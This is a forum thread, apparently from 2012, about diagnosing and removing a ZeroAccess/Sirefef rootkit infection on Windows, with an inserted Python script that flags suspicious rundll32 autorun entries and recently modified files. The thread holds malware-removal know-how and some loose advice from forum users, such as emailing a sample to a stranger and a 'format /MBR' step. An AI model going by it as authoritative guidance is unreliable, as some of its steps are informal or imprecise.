filter,0x00600000,1,1,itvdata.dll,6.06.7601.17514 DVD Navigator,0x00200000,0,3,qdvd.dll,6.06.7601.17713 Microsoft TV Subtitles Decoder,0x00200001,1,0,MSTVCapn.dll,6.01.7601.17715 Overlay Mixer2,0x00200000,1,1,qdvd.dll,6.06.7601.17713 
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 12:42:57 AM
What is this: O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep
Nothing else stands out to me, at least.
Do I "fix" it? Most definitely! Before you go wiping it though, let's make sure it did not make any way to copy itself again. First kill all the iexplorer.exe running in Task Manager, that's scary. ;p And the Flash_util_activex after. Then browse to My Computer, click the C: drive and use the search box at top right to search for wrorap.dll. What we want to do is, one, get a copy of it and, two, find out when it was created. Please email a copy to 'titusville tech AT gmail . com' (remove spaces). Once you know the date it was created, do another file search for all files created or modified on that same date, using the advanced search functions. Please share if you find anything. At this point also run the fix for that one file at least. Let us know if your date modified/created search returns anything unusual. Cheers
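As an added example (not code from the thread or from any tool named in it), here is a small Python triage script for the two checks above: it parses HijackThis-style O4 autorun lines, flags entries where rundll32.exe loads a DLL from a user-writable profile directory (the wrorap.dll pattern), and then lists files under a directory whose modification time falls within a window of the flagged DLL's timestamp. The sample O4 lines are constructed, as is the directory the function walks.

```python
"""
Autorun triage helper, written for this thread as an added example.

It parses HijackThis-style O4 lines, flags entries where rundll32.exe
loads a DLL from a user-writable profile directory, and lists files under
a directory whose mtime is within a window of a reference timestamp (the
"what else was created or modified on that date" search, tightened to a
window so the list stays short).
"""
import os
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines in HijackThis O4 format. The first mirrors the
# entry quoted in the thread; the rest are made-up benign autoruns.
SAMPLE_O4_LINES = [
    r'O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep',
    r'O4 - HKLM\..\Run: [MSC] "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey',
    r'O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun',
    r'O4 - HKLM\..\Run: [NvCpl] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup',
]

O4_RE = re.compile(r'^O4 - (?P<hive>HK\w+)\\\.\.\\(?P<key>\w+): \[(?P<name>[^\]]*)\] (?P<cmd>.*)$')

# Path fragments an unprivileged user can write to. A DLL loaded by rundll32
# from one of these deserves a second look; system32 or Program Files does not.
USER_WRITABLE_MARKERS = ('\\appdata\\', '\\temp\\', '\\programdata\\', '\\downloads\\')


@dataclass
class O4Entry:
    hive: str
    key: str
    name: str
    command: str
    rundll32_target: Optional[str]  # DLL path when the command is a rundll32 loader


def _rundll32_target(cmd: str) -> Optional[str]:
    """Return the DLL path when cmd is `rundll32.exe <dll>,<entry>`, else None."""
    # Tokenise respecting double quotes: "C:\x y\rundll32.exe" "C:\z\a.dll",Entry
    tokens = [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmd)]
    if len(tokens) < 2 or not tokens[0].lower().endswith('rundll32.exe'):
        return None
    return tokens[1].split(',', 1)[0]  # drop the ",EntryPoint" suffix


def parse_o4(line: str) -> Optional[O4Entry]:
    """Parse one O4 line; returns None for lines that are not O4 entries."""
    m = O4_RE.match(line.strip())
    if not m:
        return None
    cmd = m.group('cmd')
    return O4Entry(m.group('hive'), m.group('key'), m.group('name'), cmd, _rundll32_target(cmd))


def is_suspicious(entry: O4Entry) -> bool:
    """True when rundll32 is loading a DLL out of a user-writable location."""
    if entry.rundll32_target is None:
        return False
    path = entry.rundll32_target.lower()
    return any(marker in path for marker in USER_WRITABLE_MARKERS)


def triage(lines: List[str]) -> List[O4Entry]:
    """Return the O4 entries from `lines` that match the suspicious pattern."""
    entries = [e for e in map(parse_o4, lines) if e is not None]
    return [e for e in entries if is_suspicious(e)]


def files_modified_near(root: str, reference_time: float, window_seconds: int = 3600) -> List[str]:
    """Paths under root whose mtime is within +/- window_seconds of reference_time.

    Only mtime is used so the result is the same on every platform; on Windows,
    st_ctime would add the creation time the post asks about.
    """
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                mtime = os.stat(p).st_mtime
            except OSError:
                continue  # vanished or unreadable file: skip rather than abort the walk
            if abs(mtime - reference_time) <= window_seconds:
                hits.append(p)
    return sorted(hits)


if __name__ == '__main__':
    for e in triage(SAMPLE_O4_LINES):
        print(f'SUSPECT {e.hive}\\..\\{e.key} [{e.name}] -> {e.rundll32_target}')
```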
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 12:58:38 AM
What is this: O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep
Nothing else stands out to me, at least.
Do I "fix" it? Most definitely! Before you go wiping it though, let's make sure it did not make any way to copy itself again. First kill all the iexplorer.exe running in Task Manager, that's scary. ;p And the Flash_util_activex after. Then browse to My Computer, click the C: drive and use the search box at top right to search for wrorap.dll. What we want to do is, one, get a copy of it and, two, find out when it was created. Please email a copy to 'titusville tech AT gmail . com' (remove spaces). Once you know the date it was created, do another file search for all files created or modified on that same date, using the advanced search functions. Please share if you find anything. At this point also run the fix for that one file at least. Let us know if your date modified/created search returns anything unusual. Cheers
Here's the file in base64 encoding (I also sent an email, but this is more public).
Edit: There was something here, but I realized that was the quarantine. Never mind.
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 01:09:08 AM
Are you using a device from Midiman called M-Audio or some such via firewire?
Edit: if it will let you, enable the BITS (Background Intelligent Transfer Service) service from services.msc and see if you can then access the Windows Update functions.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 01:18:45 AM
Edit: if it will let you, enable the BITS (Background Intelligent Transfer Service) service from services.msc and see if you can then access the Windows Update functions.
None of these services exist anymore:
- BITS
- Microsoft Antimalware
- Windows Firewall
- Windows Update
Are you using a device from Midiman called M-Audio or some such via firewire?
The file has definitely been renamed and corrupted. Here are some suspicious traits: No permissions have been assigned for this object.
Warning: this is a potential security risk because anyone who can access this object can take ownership of it. The object’s owner should assign permissions as soon as possible.
Original filename: mafwcpl.exe
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 01:24:32 AM
Edit: if it will let you, enable the BITS (Background Intelligent Transfer Service) service from services.msc and see if you can then access the Windows Update functions.
None of these services exist anymore:
- BITS
- Microsoft Antimalware
- Windows Firewall
- Windows Update
Are you using a device from Midiman called M-Audio or some such via firewire?
The file has definitely been renamed and corrupted. Here are some suspicious traits: No permissions have been assigned for this object.
Warning: this is a potential security risk because anyone who can access this object can take ownership of it. The object’s owner should assign permissions as soon as possible.
Original filename: mafwcpl.exe
Aye, that file we have now is not the original. Did you find anything else modified around the same time? As for the missing services: OUCH. You are likely going to need to at the very least run a repair install of Win 7.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 01:40:46 AM
I have a restore point from the last Windows update. Will that restore the missing services?
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 01:41:51 AM
I have a restore point from the last Windows update. Will that restore the missing services?
Is that date before that file was created? And I am not totally sure on that. It kind of depends in what manner they have been removed.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 01:43:57 AM
I have a restore point from the last Windows update. Will that restore the missing services?
Is that date before that file was created? And I am not totally sure on that. It kind of depends in what manner they have been removed. Yes, and Windows Update was certainly working. I guess I'll try, and if that doesn't work, repair install. Thanks for your help! It saved me a lot of grief and was greatly appreciated. BTW: wrorap.dll somehow hacked the web browsers (it was being used by them when I tried to delete it). That's what was causing the redirects.
Title: Re: Windows infection: please help a security newbie
Post by: check_status on July 23, 2012, 02:19:59 AM
Probably installed javascript into the profile of Firefox, you may need to create a new profile.
Title: Re: Windows infection: please help a security newbie
Post by: finkleshnorts on July 23, 2012, 04:07:04 AM
I have a restore point from the last Windows update. Will that restore the missing services?
Is that date before that file was created? And I am not totally sure on that. It kind of depends in what manner they have been removed. Yes, and Windows Update was certainly working. I guess I'll try, and if that doesn't work, repair install. Thanks for your help! It saved me a lot of grief and was greatly appreciated. BTW: wrorap.dll somehow hacked the web browsers (it was being used by them when I tried to delete it). That's what was causing the redirects.
Restore points can be infected.
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 04:39:24 AM
Probably installed javascript into the profile of Firefox, you may need to create a new profile.
Aye, not a bad idea at all. I take it you were able to remove it in safe mode? Was Firefox the only browser that was redirecting on you? Probably will not hurt to reinstall any other browsers you were using as well. And now you got me curious as to the source of that thing. I hadn't bothered to decompile that dll to see the actual script in it as I figured you had it whipped. But it could not hurt to. Another handy trick is to find a compiled piece of the malicious code to use to search for inside of all the files on your comp. I've been able to find quite a few left over 'dormant' pieces of nasties that would have otherwise gone undetected that way. Let us know if you still have issues removing that file. Or skip ahead of posting again and use: http://www.scanwith.com/Pocket_KillBox_download.htm Add the file path to the box, check the 'delete on reboot' option and then, if you are ready to reboot, hit the little red X to the right of the file location input. That should have no issues removing it. If so, let us know. Cheers
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 11:37:29 PM
It was ZeroAccess.
I'll update soon: I'm running some scans to make sure the rootkit is completely gone.
Firefox redirected the worst (on load and nearly every search result). IE also redirected. Chromium refused to work until recently (it wouldn't connect to anything).
Update:
ZeroAccess is apparently a rootkit that uses a variety of techniques to circumvent UAC by injecting code into UAC exceptions. I had not realized the dangers of keeping UAC at the "recommended" level, believing it to be sufficient in preventing malware. UAC is now set at the highest level.
ZeroAccess also downloaded a Bitcoin-related trojan (this is what most worries me). At this point, all my bitcoin is still present and remains encrypted. This was the cause of the slow computer; the bitcoin trojan converted it into a botnet.
ZeroAccess deleted some important services. Most importantly, Windows Update and Windows Firewall have been deleted. I will probably do a repair install, as a system restore seems too risky (what if it restores the rootkit?).
At this point, ZeroAccess should have been removed. At the very least, its symptoms are no longer present.
Edit: Windows Update has been restored (I needed to reregister the services, but the dlls were not deleted). I have reinstalled MSE and the computer should be much safer now. Now, I'm trying to fix Windows firewall, which isn't as crucial as the other two.
Title: Re: Windows infection: please help a security newbie
Post by: rjk on July 24, 2012, 03:07:07 AM
Personally, I never trust an infected computer ever again. All kinds of shit happens that's easy to miss and will cause future problems. If you hold any significant amount of bitcoins, it would be a good idea to move them to a known secure computer. And I mean move the encrypted wallet without first decrypting it, since you can't be sure there isn't a lingering keylogger or some shit like that.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 24, 2012, 03:12:43 AM
I have rediscovered an even more serious infection. This time, some core Windows system files were damaged.
"Windows has encountered a critical problem and will restart in one minute".
Yes, even in safe mode.
I have resorted to system restore, which has fixed the critical problem (additionally, all services have been restored). MSE is currently running, but only so I can gain some experience on how to deal with a severe infection.
At this point, I am simply going to install Ubuntu tomorrow. After dealing with ZeroAccess, this newly discovered and even worse infection will simply be an exercise to remove.
Title: Re: Windows infection: please help a security newbie
Post by: myrkul on July 24, 2012, 03:17:30 AM
At this point, I am simply going to install Ubuntu tomorrow. After dealing with ZeroAccess, this newly discovered and even worse infection will simply be an exercise to remove.
Windows, your days are numbered! http://www.youtube.com/watch?v=CWsJcg-g1pg That said, the most recent Ubuntu is not my favorite. Unity... ick. But it's a great Linux beginner OS.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 24, 2012, 03:21:34 AM
Sirefef is the trojan's name. I think it's currently under control (quarantined by MSE, which is saved by the system restore). At this point, I am simply going to install Ubuntu tomorrow. After dealing with ZeroAccess, this newly discovered and even worse infection will simply be an exercise to remove.
Windows, your days are numbered! http://www.youtube.com/watch?v=CWsJcg-g1pg That said, the most recent Ubuntu is not my favorite. Unity... ick. But it's a great Linux beginner OS. I wish there was audio in safe mode now. Ubuntu is good enough for me, because I've actually used it before. Edit: Wow, these viruses are good. They just deleted the Windows Security Centre service... in Safe Mode. The reason this is so significant is that that is not a service that can even start in Safe Mode.
Title: Re: Windows infection: please help a security newbie
Post by: check_status on July 24, 2012, 05:03:38 AM
Well, there are both benefits and disadvantages to using Linux. Linux does have malware, rootkits, worms, trojans, privilege escalation, vulnerabilities. The benefit of Linux is that the majority of the malware attacks always start in user space; the disadvantage is that tools are not well discussed, so newbies cannot acquire improved security. Often, security questions are met with responses like, "You're on Linux now, stop worrying, there is no malware here, just move along...". Little do they know, their question was being answered by a blackhat, who isn't interested in helping to reduce his ability to pwn your box. Because of this atmosphere that "Linux is immune", it makes detecting an infection or security threat much harder for a newb than it is in Windows. Ask yourself this: if a rootkit/worm/trojan/keylogger were running in your Linux system, how would I find it? Now see how many people will teach you how to look for the signs. While Linux is better at default security than Windows, the length of time an infection will go undiscovered by a newb on Linux will be much longer, if infected.
Title: Re: Windows infection: please help a security newbie
Post by: myrkul on July 24, 2012, 05:16:05 AM
Well, there are both benefits and disadvantages to using Linux. Linux does have malware, rootkits, worms, trojans, privilege escalation, vulnerabilities. Yes, and Ubuntu is starting to get big enough to be a targetable audience (i.e., it's worth the hacker's time). But the very nature of the Linux ecosystem makes it harder to program a single bug that will infect everyone, and the open-source nature and upstream fixes make any holes shorter-lived. No system is 100% secure. But compared to Windows, Linux might as well be. (Especially if, like me, you use some off-brand Linux, and keep everything updated.)
Title: Re: Windows infection: please help a security newbie
Post by: Vladimir on July 24, 2012, 05:16:59 AM
Whether you like it or not, wipe all and reinstall is what you need to do.
Title: Re: Windows infection: please help a security newbie
Post by: 01BTC10 on July 24, 2012, 05:37:25 AM
Whether you like it or not, wipe all and reinstall is what you need to do.
+1 And some very specialised rootkits can even infect the BIOS, so in a company environment you need to flash the BIOS before reinstall. You can't trust a computer that has ever been infected. http://www.tomshardware.com/news/bios-virus-rootkit-security-backdoor,7400.html
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 24, 2012, 04:48:19 PM
Whether you like it or not, wipe all and reinstall is what you need to do.
+1 And some very specialised rootkits can even infect the BIOS, so in a company environment you need to flash the BIOS before reinstall. You can't trust a computer that has ever been infected. http://www.tomshardware.com/news/bios-virus-rootkit-security-backdoor,7400.html If I'm going to be switching OS's, should I still worry about this?
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 24, 2012, 05:21:32 PM
Whether you like it or not, wipe all and reinstall is what you need to do.
+1 And some very specialised rootkits can even infect the BIOS, so in a company environment you need to flash the BIOS before reinstall. You can't trust a computer that has ever been infected. http://www.tomshardware.com/news/bios-virus-rootkit-security-backdoor,7400.html If I'm going to be switching OS's, should I still worry about this? Def +1 to what Vlad and 01BTC10 are saying. You seem to have some fairly uncommon nasties on your machine. It probably would not hurt at all to boot from a floppy or livecd made from another machine and flash the BIOS. Also, when you do format the drive to reinstall, make sure to format /MBR and format /S as well from a known clean disk. Nasty stuff there, m8. If that was in my shop, I'd probably just destroy the HDD, replace the mobo and rest comfortably versus wondering IF there is some more advanced infection involved.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 24, 2012, 05:34:12 PM
Whether you like it or not, wipe all and reinstall is what you need to do.
+1 And some very specialised rootkits can even infect the BIOS, so in a company environment you need to flash the BIOS before reinstall. You can't trust a computer that has ever been infected. http://www.tomshardware.com/news/bios-virus-rootkit-security-backdoor,7400.html If I'm going to be switching OS's, should I still worry about this? Def +1 to what Vlad and 01BTC10 are saying. You seem to have some fairly uncommon nasties on your machine. It probably would not hurt at all to boot from a floppy or livecd made from another machine and flash the BIOS. Also, when you do format the drive to reinstall, make sure to format /MBR and format /S as well from a known clean disk. Nasty stuff there, m8. If that was in my shop, I'd probably just destroy the HDD, replace the mobo and rest comfortably versus wondering IF there is some more advanced infection involved. I'd rather not risk killing the BIOS to remove something that a) probably isn't there and b) probably doesn't matter. Why should I format the MBR? Won't that destroy the partition table?
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 24, 2012, 05:43:28 PM
Why should I format the MBR? Won't that destroy the partition table?
Why yes, yes it will, amongst other things. Windows has no issues installing to an unpartitioned drive. It will allow you to add the partitions at the same screen where you would pick the drive when you're installing. Just click Advanced. When you get reinstalled, you could at least check the BIOS. From your Windows-based BIOS app (most mobos these days have one), do a backup of the BIOS and compare it to a download from the vendor site of the same version. Cheers